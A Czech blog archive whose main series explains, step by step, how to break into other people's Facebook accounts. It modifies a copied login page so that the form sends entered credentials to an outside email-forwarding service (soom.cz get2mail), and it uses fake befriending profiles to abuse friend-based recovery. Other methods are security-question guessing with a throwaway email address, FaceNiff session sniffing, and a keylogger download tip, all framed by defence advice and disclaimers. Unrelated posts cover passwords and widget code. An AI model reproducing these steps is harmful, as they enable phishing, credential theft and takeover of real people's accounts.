Hack s pomocí přátel

Bře 01
2013

                Po delší době jsem narazil na nový postup, jak se nabourat do FB účtů. Momentálně ho testuji skrze své fake účty přímo na svém profilu a jak se zdá, je jenom otázkou času, kdy se mi vlastní účet podaří hacknout. Tento způsob je tak trochu běh na dlouhou trať, bude-li však mít hacker trpělivost, v cestě proniknout do požadovaného FB účtu mu bude bránit už jenom opatrnost vlastníka profilu. Celé je to totiž (nečekaně) opět založené na naivitě uživatelů. A přitom stačí dodržovat jediné pravidlo a této potencionální hrozbě se můžete zcela vyhnout!

  • Jak to celé funguje? 

Facebook umožňuje obnovit heslo pomocí tří vašich přátel. V případě ztráty hesla, máte možnost vygenerovat si nové heslo. Heslo se rozdělí na tři části a každá z částí se odešle jednomu z vašich přátel. Dosud nevidíte cestičku, jak získat potřebné heslo? Celé kouzlo věci spočívá v tom, že si uvedené tři přátele máte možnost vybrat sami! Pořád vám nic nedošlo? Dobře… pojďme se na to podívat z bližší perspektivy.

  • Znáte skutečně všechny Vaše přátelé?

Celé kouzlo spočívá v tom, že v dnešní době si téměř každý, přidává každého do přátel. Teď je správný čas si přiznat, znáte skutečně všechny “rádoby” přátelé, co mají přístup k vašemu full profilu? Viděli jste všechny přátele někdy osobně? Ne!? Špatně, jste možná v ohrožení. Nejspíš si v duchu říkáte, že nejste takový, že by jste si přidávali neznámý lidi. Ve skutečnosti takové výjimky “přidavači přátel” existují a není jich málo! Co když, však uvedená osoba, žádající o přátelství, bude mít mezi přáteli vaše skutečné přátelé, které skutečně osobně znáte? Opět  nezaváháte? To už je těžší co? Dobře, co udělá většina z nás? Napíše neznámému zprávu ve smyslu “My se známe?” a čeká na odpověď. Asi by jste udělali to samé co?

  • Čas kreativity přichází

Nyní přichází čas na trochu kreativity nebo spíše lží. S uvedený člověkem, máte společné přátelé, co teď? Stačí nyní lehce zapátrat po jejich profilech a zjistit např. jak se uvedená osoba “kterou si chceme přidat” zná s člověkem “kterého už jsme lapili” a pak vymyslet jednoduchý příběh např. potkali jsme se společně s tímhle, na téhle akci a doložit akci, kterou skutečně oba navštívili. Příběhů které si můžete vymyslet je mraky, záleží jen na fantazii a hledání.

  • A to je ta slabina!

Žádající Vám poskytl skutečný důkaz, opravdu toho člověka znáte, opravdu jste tam tehdy na té akci byl. Co když jsem byl natolik opilí a nepamatuji si, že jsme spolu skutečně mluvili. Začnou se nám honit  v hlavě myšlenky a nakonec zvědavost zvítězí a my chceme vědět podrobnější informace o daném žadateli. Klikneme na tížené tlačítko přidat do přátel. Sláva! Uživatel je právě chycen do pasti “pokud si následovně po prohlédnutí,náš účet z přátel opět neodebere” .

  • K čemu tohle všechno? Co teď? Nechápu smysl!

Výše jsem uvedl složitější příklad, mnoho lidí si Vás přidá, aniž by jste měli cokoliv společného. Další si Vás přidají, jen z důvodu, že jste již předtím získal společné přátelé. Ty nejpečlivější se Vás zeptají odkud se znáte. Odpovíte-li nějak rozumně, máte je taky. Jen menší část, si Vás nepřidá ani po tomto kroku.

A k čemu to celé bylo? Na začátku článku jsem,  psal že si můžete nechat zaslat heslo pomocí třech přátel. A co jste právě získali? Přístup jednoho fake profilu k osobě, které se chcete dostat do účtu.  Nyní stačí celý postup opakovat ještě jednou s dalším fake profilem. Pokud si Vás přidá i po druhé, máte již téměř vyhráno.

Právě jste získali tři společné přátelé, které všechny můžete ovládat. Svůj skutečný účet a dva fake profily. Naštěstí ještě pro postihnutého, není dobojováno. Nyní je třeba, být lehce aktivní na fake profilech.. tzn. lajkovat postihnutému fotky , psát komentáře, psát privátní zprávy, atd. zkrátka se u něho na profilu lehce zabydlet. Po delší době, se zobrazí zmíněné dva fake profily a váš skutečný v seznamu důvěryhodných přátel, kam lze zaslat heslo.

  • Jak se mám bránit?

Nejúčinnější obrana je naprosto jednoduchá, přemýšlejte než potvrdíte někomu přátelství! Potvrzujte přátelství jen lidem, které skutečně znáte! I když Vám zmíněná osoba píše, že se znáte odtud a odtud, nevěřte! Pokud jen lehce zapochybujete, odložte přátelství např. do té doby, než zmíněnou osobu potkáte v reálném světě. Eventuálně napiště kamarádovi, kterému skutečně věříte a zeptejte se ho, o koho jde… pokud si též nebude jistý, jedná se o jasný fake profil. Nepřidávat! Nepřidávat! A nevěřit každé historce!

Zpět na hlavní článek >> Jak hacknout facebook ?

Pokračovat na >> Keylogger , Kontrolní otázkaFaceNiff, Phishing, Hack s pomocí přátel

_________________________________________________________________________________

Tento článek není návodem k páchání trestné činnosti, pouze jsem na něm ukázal, jak zranitelné jsou každodenní webové služby bez použití SSL a jak málo stačí při Vaší nepozornosti k tomu, aby jste vyzradili Vaše přístupové údaje někomu cizímu.

Jak hacknout facebook ?

Bře 18
2012

Jak hacknout facebook? Dobře, přiznávám název článku zní trošku nadnešeně. Určitě neočekávejte od tohoto článků, že Vám krok po kroku poradí, jak vypnout jednu z největších sociálních sítí na světě s téměř 750 miliony uživatelů. Pokud jste přesně tohle chtěli zjistit, máte nejspíš smůlu a je nejvyšší čas opustit od čtení. Opravdovým cílem tohoto článku je ukázat, jak je celkem  jednoduché s trochou snahy,  dostat se někomu do účtu , případně zjistit jeho přihlašovací údaje na profil.Druhým dechem bych rád dodal, že článek by měl především sloužit jako varování. A především tak ponaučit uživatele, na co by si měli dát pozor. Případně jakým nejčastějším situacím při používání Facebooku je nejlépe se vyvarovat. V opačném případě Vám dost hrozí, že dáváte svoje údaje v risk.

Existuje celá řádka způsobu, jak docílit získání přihlašovacích údajů na konkrétního uživatele. V dnešním článku se Vám pokusím představit celkem čtyři zcela odlišné způsoby.  Vždy uvedu způsob a zároveň obranu, tak aby jste se sami nestali možnými poškozenými.  Níže uvedené způsoby, je zakázané praktikovat v reálném prostředí, pokud se nechcete dostat do křížku ze zákonem.

Co říct na závěr? Taky Vám ztuhl úsměv na tváři, jak vlastně jednoduché to celé je? S troškou šikovnosti a odhodlanosti někoho,  je Váš účet celkem v nebezpečí. Doporučuji tedy řádně pročíst ještě jednou odstavce – ” Jak se mám bránit? ” u jednotlivých způsobu a snažit se jimi co nejvíce řídit. Nedávejte své přihlašovací údaje zadarmo na potkání, pokuste se to alespoň co nejvíce dotyčnému zkomplikovat ;). Pokud jste se setkali s dalšími způsoby? Neváhejte napsat do komentářů níže, článek rád o Vaše tipy doplním.
_________________________________________________________________________________
Tento článek není návodem k páchání trestné činnosti, pouze jsem na něm ukázal, jak zranitelné jsou každodenní webové služby bez použití SSL a jak málo stačí při Vaší nepozornosti k tomu, aby jste vyzradili Vaše přístupové údaje někomu cizímu.

Phishing

Bře 18
2012

Další cizí slovo, který nejspíš většině z Vás nic neřekne. Phishing vychází z anglické slova fishing což  znamená rybaření, myšleno v kontextu jako “návnada” a počáteční písmeno f je nahrazeno ph, což má trošku hlubší význam, pokud Vás to zajímá mrkněte na wikipedia.cz. Abych to uzavřel, přeložil bych Phishing trošku nadnešeně jako – “návnady pro lamy” 🙂 . Ajťáci pochopí, laická veřejnost asi bude dumat proč, jsem použil slovo lamy. Ale to by bylo na další vysvětlování.

Co to tedy přesně dělá a jak mi to pomůže hacknou někomu účet? Phishing je podvodná technika používaná na Internetu k získávání citlivých údajů,  nejčastěji se jedná o zadání osobních údajů na falešnou stránku, která na první pohled není k rozeznání od skutečné stránky. V podstatě uživatel, takto věnuje své citlivá data aniž by měl ponětí, že právě naletěl podvodníkům.

Takže náš úkol bude vytvořit totožnou kopii Facebook úvodní příhlašovací stránky, kterou tak všichni dobře známe. Následovně zařídit, aby jsme obdrželi takto získané údaje na svůj email. První krok, přejděte na stránka facebook.com, klikněte pravým tlačítkem myši kamkoliv na stránku, z menu vyberte Zobrazit zdrojkový kód stránky ( Google Chrome ) , Zobrazit zdrojový kód ( IE 9 ) , Zobrazit zdrojový kód stránky ( Firefox ) . Použijte kombinaci kláves CTRL + A označit vše, CTRL + C kopírovat.  Otevřete si nyní např. notepad nebo word a vložte CTRL + V . Nyní jděte na stránku soom.cz , proveďte registraci na stránkách  a následovně z pravého menu vyberte GET2MAIL a klikněte na možnost Registrovat nové id . Vygeneruje se Vám ID, které zhruba bude vypadat nějak následovně 02184f4679 . Klikněte na něj a zaškrtněte možnost – Zasílat data e-mailem (vas@email.cz)  Nyní se vraťte zpět ke zdrojovému kódu stránky a v kódu najděte spojení:

<form id=”POST” action=” https://www.facebook.com/login.php?login_attempt=1″ method=”post” onsubmit=”return Event.__inlineSubmit(this,event)”>

a nahraďte

<form id=”POST” action=” http://www.soom.cz/projects/get2mail/redir.php?id= 02184f4679&url=https://www.facebook.com/login.php?login_attempt=1″ method=”post” onsubmit=”return Event.__inlineSubmit(this,event)”>

za červený text dosaďte Vaše ID, které jste si vygenerovali na stránkách soom.cz. Nyní celý text opět označte CTRL + A a kopírujte CTRL + C . Otevřete si stránku pastehtml.com , nakopírujte změněný zdrojový kód Facebooku. Klikněte na modré tlačítko Publish page a opět vpravo nahoře na Publish page. Objeví se Vám stránka s linkem, tento link si zkopírujte a vložte do prohlížeče. Tadááá výsledek je na světě, mrkněte jak by zhruba měl vypadat >> SEM  << . Nyní stačí jen, když Vám někdo na této stránce vyplní přihlášení na svůj profil a Vám tak automaticky přijdou tyto informace na email.

  • Je to skutečně tak vážný?

Ano, jedná se o celkem vážný případ, kdy méně znalý uživatel může naletět na takto podvodně vytvořené stránky. Neboť i když se stránka nachází na jiné doméně, mnozí nepozorní uživatelé si toho nevšimnou a to nemluvím, že není větší problém, stránku nechat otevírat ve framu aniž by byla adresa stránky vůbec vidět ! Mimo to,  uživatel zadá svoje přihlašovací údaje a následovně mu naskočí pravá facebook stránka!  Uživatel se  tak domnívá, že pouze špatně vyplnil heslo, neboť ho facebook vyžaduje znova ! Ve skutečnosti, však právě jeho heslo odešlo někomu do mejl boxu a on se poprvé skutečně hlásí do svého FB profilu.

  • Jak se mám bránit?

Jediným řešením je neklikat na různé tlačítka líbí se mi, neklikat na odkazy odkazující na facebook z jiných stránek. Vždy se přihlašujte na svůj Facebook profil pouze přes doménu www.facebook.com ! Jakmile zpozorujete cokoliv jiného, rychle ze stránek vycouvejte! Kontrolujte adresu stránky ve Vašem prohlížeči, případně když najedete myší na jakýkoliv odkaz, většinou se v prohlížeči vlevo dole, při najetí na odkaz zobrazí skutečná adresa stránky, na kterou budete odkázáni.

Zpět na hlavní článek >> Jak hacknout facebook ?

Pokračovat na >> Keylogger , Kontrolní otázkaFaceNiff, Phishing, Hack s pomocí přátel

_________________________________________________________________________________

Tento článek není návodem k páchání trestné činnosti, pouze jsem na něm ukázal, jak zranitelné jsou každodenní webové služby bez použití SSL a jak málo stačí při Vaší nepozornosti k tomu, aby jste vyzradili Vaše přístupové údaje někomu cizímu.

FaceNiff

Bře 18
2012

Předpokládám, že většině z Vás pojem FaceNiff slyší poprvé. Jedná se o prográmek, který je určený pro mobilní telefony s operačním systémem Android. A co tento prográmek dělá? Jednoduše analyzuje komunikaci v síti a hledá ty datové pakety, které tečou na servery Facebooku.  Hmm zajímavé, ale co já s tím? Díky tomuto prográmku, můžete získat unikátní session ID právě platného pro Facebook účet, který vyvíjí aktivitu ve Vašem okolí v rámci Wi-fi sítě. Dobře, zkusím vysvětlit ještě jednou, trochu více polopatě 🙂 .

Představte si, sedíte venku na zahrádce, číšník Vám přinese pivo,venku je krásně…všimnete si, že kousek od Vás sedí krásný/á  kluk/holka a cosi datluje do svého notebooku. A Vás by tak strašně zajímalo se o něm dozvědět něco více, ale jste příliš stydlivý, aby jste se zvedli a  šli se ho zeptat přímo. Samozřejmě, že je na zahrádce k dipozici připojení k internetu přes Wi-fi síť . Není těžké odhadnou, že zmíněný človíček je třeba právě na svém Facebooku. Jako téměř každý mladý, připojený k internetu. Co teď? Máte v kapse mobil s Androidem a nainstalovanou aplikací FaceNiff. Stačí zapnou aplikaci, která již sama nalezne aktivní účty ve Vašem okolí. Pokud budete mít trošku štěstí, podaří se Vám připojit na jeho/její profil a vyčíst tak všechny potřebné údaje.

  • Je to opravdu tak jednoduchý?

Naštěstí to tak jednoduchý není, tzn. neočekávejte, že každý s operačním systémem Android ve Vašem okolí Vám může hacknout Váš profil 😉 . Neboť k tomu aby aplikace FaceNiff na Vašem telefonu fungovala, musíte provést další změny přímo v telefonu. Především se pak dostat do rootu Vašeho mobilu tzn. vytvoření jakéhosi superuživatele, který má přístup ke všem součástem softwaru telefonu. Je to obdoba správce systému, jak ho znáte z desktopových Windows ( v případě zájmu, více informací v článku – ”  Co to je root telefonu a k čemu je to dobré ” ) . Každý telefon má svůj vlastní způsob, jak výše zmíněného docílit, doporučuji Vám vyhledat přesný návod. Jen bych Vás rád upozornil, že veškerá rizika, včetně možného poškození systému či “bricknutí” telefonu jdou výhradně na Vaši zodpovědnost.

  • Jak se mám bránit?

Obrana proti programu FaceNiff je velmi jednoduchá, stačí donutit Facebook komunikovat za pomocí SSL šifrování. Přejděte na Nastavení účtu z menu na levé straně zvolte Zabezpečení a u první možnosti Zabezpečené procházení klikněte na Upravit a zatrhněte políčko možnost – Kdykoli je to možné, používat Facebook prostřednictvím zabezpečeného připojení (HTTPS) . A jste v bezpečí i když budete brouzdat na netu přes Wifinu a pít pivo 😉 .

Zpět na hlavní článek >> Jak hacknout facebook ?

Pokračovat na >> KeyloggerKontrolní otázka, FaceNiff, PhishingHack s pomocí přátel

_________________________________________________________________________________

Tento článek není návodem k páchání trestné činnosti, pouze jsem na něm ukázal, jak zranitelné jsou každodenní webové služby bez použití SSL a jak málo stačí při Vaší nepozornosti k tomu, aby jste vyzradili Vaše přístupové údaje někomu cizímu.

Kontrolní otázka

Bře 18
2012

Není to ani tak hacknutí jako spíš využití lidské blbosti uživatelů. Neboť přístup přes kontrolní otázku, je někdy až příliš jednoduchý. Jak je to možný? Zkrátka 99% uživatelů používá na kontrolní otázky správné odpovědi, tzn. odpovědi které lze nějakým způsobem získat.

Klikněte na Zapomněli jste své heslo?  pod polem heslo,  Zadejte své jméno a jméno přítele. Tzn. člověka kterému se chcete dostat do účtu + jednoho jeho kamaráda, snadno zjistíte z návštěvy jeho profilu, neboť málo kdo používá funkci skrýt své přátelé. Následovně na Vás vyskočí tabulka s dotazem “Chcete obnovit své heslo?” , kde vidíte počáteční písmena registračního emailu či telefonu. Klikněte na na možnost – Nemáte již přístup k těmto údajům? . Jděte na stránku 10 Minute Mail nechte si vygenerovat automaticky e-mail, který Vám poslouží na 10 minut. Nechceme přeci uvádět svůj pravý email. Takto vygenerovaný email použijte jako náhradní email do polí” Jak vás můžeme zastihnout? “. Pokud uživatel použil a vyplnil bezpečnostní otázku, Facebook  ji po Vás nyní bude požadovat. A teď přichází Vaše chvíle. Neboť Facebook, má nastaveno defaultně pouze 6 otázek. Při troše snaze, není větší problém na uvedené otázky zjistit odpovědi ! Stačí zapojit Google vyhledávač, pořádně projet uživateli profil či zajít na spolužáky. Případně cílit přímo na uživatele dobře zvolené komenty či vzkazy, kterým z něj zmíněné odpovědi vytáhnete a on nebude mít přitom nejmenší tušení, že Vám věnoval lístky do první řady na jeho profil.  A to nemluvím, že město narození Vaší matky je zpravidla získatelné ze státem poskytovaných zdrojů !

Jak se jmenovalo tvoje první zvířátko ?

– najdete na fotkách na profilu, případně zjistíte  konverzací s dotyčným

Jaké bylo příjmení tvojí učitelky na základní škole?

– konverzace s dotyčným případně s bývalím spolužákem, jehož jméno zjistíte na profilu třídy na serveru spoluzaci.cz , eventuálně třídní stránky, stránky školy, atd..

V jakém městě se narodila Vaše matka?

– odhadnout dle místa současného bydliště, kde jsou porodnice a tak…

Vašich posledních 5 znaků z řidičského průkazu?

– toto většinou nikdo nepoužívá a zjistit by to bylo dost složité, při konverzaci těžko naleznete téma na znaky na řidičáku, tzn. jediný řešení dotyčného vzít do hospody, pokecat… a pak si začít ukazovat fotky na jednotlivých dokladech, zapamatovat si číslo a napsat rychle do mobilu 😉

V jaké ulici jsi žil, když Ti bylo 8 let ?

– v našich končinách není ve zvyku se během života x-krát stěhovat jako jinde ve světe, tzn.  nám to dost ulehčuje práci. Většinou tedy současné bydliště odpovídá bydlišti v osmi letech ( cca. berme to jako nepsané pravidlo u uživatelů do 25 let ) . Eventuálně zjistit, kde žijí jeho rodiče. Zjistíte při konverzaci s dotyčným, kde dříve bydlel, můžete si nechat ukázat třeba na mapě přesný dům či byt 😉 .

Jaké je jméno první holky nebo prvního kluka, kterého jsi políbil?

– fotky na profilu nebo konverzace na toto téma.

Tímto jsem se Vám snažil krátce nastínit pár možností, jak tyto informace získat od Vámi požadovaného uživatele. Samozřejmě představivosti se meze nekladou a určitě existují i další způsoby, jak tyto informace lze získat či vylákat z potencionálních cílů. Nyní však zpět k procesu, jakmile správně odpovíte na jeho/její otázku, obdržíte email na Vámi založený účet. Otevřete si email, klikněte na link v emailu, budete přesměrováni zpět na Facebook , kde budete vyzváni k vytvoření nového hesla. Nyní je třeba počkat 24 hodin, než se budete moci pod novým heslem a Vámi zvoleným e-mailem (nezapomeňte si poznamenat vygenerovanou email adresu) přihlásit do Vámi nabouraného účtu. Je vhodné celé to udělat v momentě, kdy dotyčná osoba je mimo dosah připojení, aby v průběhu 24 hodin nemohl být celý průběh narušen.

  •  Jak se mám bránit ?

Nejlepší způsob jak se bránit je vyplňovat bezpečnostní otázky nepravdivě. Tzn. na otázku kde jsem žil v 8 letech napsat ulici, třeba Vaší školy. Nebo na otázku koho jsme políbil jako poprvé, napsat třeba jméno sourozence. Zkrátka tak, aby jste jako jediný znali správnou odpověď . Neboť i když někdo zjistí skutečnou odpověď, bude mu k ničemu, neboť vy používáte nepravdivou odpověď. A tu nikde nemá šanci zjistit, když není podle čeho 😉 .

Zpět na hlavní článek >> Jak hacknout facebook ?

Pokračovat na >> Keylogger, Kontrolní otázka, FaceNiffPhishingHack s pomocí přátel

_________________________________________________________________________________

Tento článek není návodem k páchání trestné činnosti, pouze jsem na něm ukázal, jak zranitelné jsou každodenní webové služby bez použití SSL a jak málo stačí při Vaší nepozornosti k tomu, aby jste vyzradili Vaše přístupové údaje někomu cizímu.

Keylogger

Bře 18
2012

Říká Vám něco slovo Keylloger ? Z anglického slova “Key – klávesa” & “Logger – záznam” nebo-li v češtině zaznamenávač kláves.  Pokud ne, jedná se o software nainstalovaný na počítači, jehož cílem je snímat otisky jednotlivých kláves. Sám software o sobě nepoškozuje nikterak Váš počítač, avšak zaznamenává veškerou Vaší aktivitu na něm.  Kterou následovně, může přeposílat komukoliv na e-mail případně ukládat formou reportu na nějaký vzdálený počítač. Osoba disponující těmito údaji, má možnost vyčtením ze záznamu získat Vaše heslo jak na FB tak kamkoliv jinam!  Na první pohled, že tento software pracuje na Vašem počítači nepoznáte, veškerý běh i jeho soubory jsou skryté, což je vcelku logické, když se má chovat tajně. Propracovanost těchto programů je v dnešní době tak velká, že dokáží i v určeném časovém rozmezí snímat aktivitu na obrazovce tzn. dělat prinscreeny. Případně mohou zaznamenávat zvukovou aktivitu či ukládat historii o navštívených webových stránek! Je toho opravdu hodně co svedou, určitě by vydalo psaní na toto téma na samostatný článek ( další info v případě zájmu na wiki ). Nejpoužívanější Keylogger nese označení All In One Keylogger a shareware verzi na 7 dní si můžete zdarma stáhnout na stránkách slunecnice.cz .

  • Jak se mám bránit?

Těžko se mi to říká, ale obrana je téměř nemožná…jediným řešením je nechodit na veřejně dostupné počítače tzn. v kavárnách, ve školách, v knihovnách apod. tam všude může číhat a být nainstalovaný takto skrytý program. Eventuálně používat tyto počítače tak, aby případně získaná data Vám nemohli nic způsobit. Ve své podstatě to znamená nepřihlašovat se do své pošty, na svůj Facebook či do internet bankovnictví jinde než z domova. Asi Vám teď v hlavě vyskočila otázka – “Nehrozí nebezpečí doma?” . Samozřejmě i tam je možné, že skrytý program se objeví, ale z 95% je jeho instalace záměrná např. jedním členem rodiny. Např. žárlivý přítel, manžel podezřívající svoji ženu z nevěry, nebo jen z důvodu, kdy rodiče hlídají činnost svých dětí na počítači. Nejbezpečnější řešením je tak mít nakonec vlastní notebook, nikomu ho nepůjčovat a mít ho dobře zaheslovaný, tak aby v případě Vaší nepřítomnosti nemohl nikdo, žádný Keylloger nainstalovat.

  • Jak zjistit  All In One Keylogger v mým počítači?

Klikněte nabídku start a do pole viz.obrázek (Prohledat programy a soubory) napište regedit,  otevřou se Vám registry windows, z horního menu vyberte Úpravy a dále pak Najít… (případně CTRL + F) do vyhledávacího pole zadejte Unkwtmjjjpqjgsp. Pokud Váš počítač obsahuje tento software, zobrazí se Vám registry obsahující toto spojení. V opačném případě tento Keylogger není ve Vašem PC.

Zpět na hlavní článek >> Jak hacknout facebook ?

Pokračovat na >> Keylogger, Kontrolní otázkaFaceNiffPhishingHack s pomocí přátel

_________________________________________________________________________________

Tento článek není návodem k páchání trestné činnosti, pouze jsem na něm ukázal, jak zranitelné jsou každodenní webové služby bez použití SSL a jak málo stačí při Vaší nepozornosti k tomu, aby jste vyzradili Vaše přístupové údaje někomu cizímu.

Jak jsem mazal účet na FaceBooku …

Říj 07
2011

       Dnes ráno jsem listoval novým speciálem 21.století aneb 666 Apokalyptických vizí budoucnosti:Máme důvod se bát zítřka? naleznete tam hromadu konspiračních teorií, článků jak se naše civilizace brzy zničí, kde kdo trpí apod. nechci nic z toho brát na lehkou váhu, ale musí se to číst s určitou nadsázkou. Avšak tento článek, není o vyhubení lidstva ale o malém sloupečku na jednaosmdesáté straně tohoto časopisu. Sloupeček píše o Jeff Bullas australském spisovateli a bloggerovi věnující se médiím a digitálnímu marketingu. Uveřejnil na internetu článek, který Vám řekne jak moc v sociálních sítích lítáte 🙂 . Podívejte na níže uvedené symptomy, trpíte nějakými? Pokud ano, měli by jste začít být obezřetelnější a klást si otázku, zda-li již nejste závisláci.

Bezpečnost nade vše !!

Úno 14
2011

Neumíte si představit svůj bežný den aby jste alespoň chvilku nebyli online? Jste nervózní pokud alespoň dvakrát denně nezkontrolujte svojí email schránku či profil na facebooku ? Pokud odpovídáte ANO, tak by jste měli nyní zpozornit!Pokud to s Vámi není tak horké, ale používáte svůj email sem tam, tak též doporučuji věnovat chvilku času následujícím řádkům.

Každý uživatel internetu má svůj email. Email je jedna z nejpouživanějších služeb internetu ! Proto je třeba jeho bezpečnosti věnovat dostatek pozornosti ! Pokud máte slabé heslo do emailové schránky, vystavujete se riziku jeho prolomení. V dnešní době prolomit heslo o pár řádech znaků většinou jednotlivých slovech je otázka pár minut, né-li sekund . Dokáže to většina bystřejších ajťáků bez jakýchkoliv větších nároků na zkušenosti, techniku či programy.  Stačí pouze vědět jak na to…

Proč jim to dělat snažší? a dovolit každému frackovi ohrozit bezpečnost emailové schránky.  Stačí se řídit pár jednoduchými pravidly a prolomit heslo, už nebude taková hračka jako doposud. Osobně se přiznám, mé heslo do emailu čítá přes 20 znaků 😉

Tak jaká jsou tedy ty pravidla?

  • nezadávejte krátké slova ani datumy narození a podobně ( např: různá jména a nicky )
  • min. délka hesla 7 znaků
  • používejte velké a malé znaky, kombinaci písmen a čísel ( např: Lama89ZAHrada1688 )
  • NIKDY!! nepoužívejte svoje heslo do emailové schránky jinam než právě do emailové schránky!!

Ano, stačí se řidit těmito čtyřmi jednoduchými a prostými pravidly a budete v bezpečí, tzn. shrneme si to… nejlépe heslo o min. délce sedmi znaků , heslo by se mělo skládat z kombinace více malých,velkých znaků a čísel. A hlavně heslo do emailu využívat právě a JEN ! do emailu. Pokud totiž budete používat totožné heslo na různých stránkách, hrozí že nějaká ze stránek nemusí být dostatečně zabezpečena a hesla z ní mohou uniknout! Následovně pachatel může vyzkoušet kombinaci získaného hesla a vašeho registračního emailu a cesta do vaší schránky je mu otevřena.

Pokud se budete řídit těmito rady, riziko zmenšíte na minimum. Pamatujte, pokud se Vám někdo dostane do emailové schránky, dostat se z emailové schránky dál už je maličkost… Facebook? stačí zaslat zapomenuté heslo na email a může tam… aukro?? stačí zaslat zapomenuté heslo na email a je tam… a takhle je to s většinou stránek, kde jste provedli registraci.

Heslo do emailu je jedno z nejdůležitějších věcí identity člověka na internetu !! Proto se k němu i tak chovejte !! Možná si myslíte, že důležitější heslo je třeba do internet banking, jenže to se mýlíte.. v dnešní době je u internet bankingu využita ochrana dvojité kontroly… jak heslo, tak autorizační smska. 😉  A to v emailu není…

Snad Vám článek pomohl a hned po přečtení si letíte změnit heslo do emailu 😉

FanBox od FaceBooku validní

Bře 21
2010

Nedávno jsem validoval přes W3C validator.w3.org ( uváděl do stavu stránky dle světových norem ) a narazil jsem na problém ohledně validace FanBoxu, který přes validátor neprošel… neboť si FB zavádí své vlastní tagy, které samozřejmě nejsou normovány a používá je výhradně a jen FB a jeho aplikace.

Celé řešení spočívá v tom strčit kód mezi tagy inframe, viz. následující kód, kde ID je ID vaší skupiny.

<script type=”text/javascript” src=”http://static.ak.connect.facebook.com/connect.php/cs_CZ”></script>
<script type=”text/javascript”>FB.init(‘02445340a472a4616b26a118d4a8b471’);</script>
<iframe scrolling=”no” frameborder=”0″ src=”http://www.facebook.com/connect/connect.php?id=257167989326&amp;connections=10&amp;stream=0″ style=”border: none; width: 300px;height: 550px;”></iframe>

Jak propojit svůj web se sociálními síti

Bře 21
2010

Poslední dobou se stali velkou módou tkz. sociální sítě, jsou to vlastně takové velice interaktivní portály, které umožňují stmelovat určité skupiny lidí, od spolužáků až po milovníky houbaření či sběratele kinder vajíček. Uživatelé si tam nejčastěji navzájem vyměňují svoje zkušenosti a nebo prostě jen “zabíjejí čas” v případě těch mladších..

A teď k tématu, v dnešní době při tvorbě webové stránky opominout tyto sociální sítě, je skoro fatální chyba. Je tomu skutečně tak, většina uživatelů internetu alespoň jednu takovou síť využívá ( jen Facebook využívá v ČR přes milion uživatelů a to opomíjíme další sítě jako Twitter či MySpace ). Proto je nezbytně nutné, ať chováme jakékoliv názory k těmto sítím se s nimi propojit.

Toho můžeme docílit mnoha způsoby, ale nejlepší z nich je využívat na svých stránkách share aplikace. Tyto aplikace umožní jakémukoliv návštěvníkovi vaší site nasdílet váš obsah tzn. článek či produkt na jejich zeď a tím informovat své přátele. A to je pro nás dobré 😉

Za jednu z nejlepších share aplikací bych považoval službu AddThis na stránkách www.addthis.com. Kterou využívá již přes osmset tisíc různých webů. Instalace jejich Buttonku jinak tlačítka, umožňující sdílet je téměř triviální. Po vybrání místa ( Website, WordPress, Blogger, MySpace ), kde bude tlačítko umístěné a stylu se automaticky vygeneruje kód, který dle instrukcí ( které též obdržíte ) vložíte kód na správné místo vašeho webu. Tím je celá akce skončena, právě jste umožnili svému webu se dostat mezi miliony uživatelů sociálních sítí 😉 .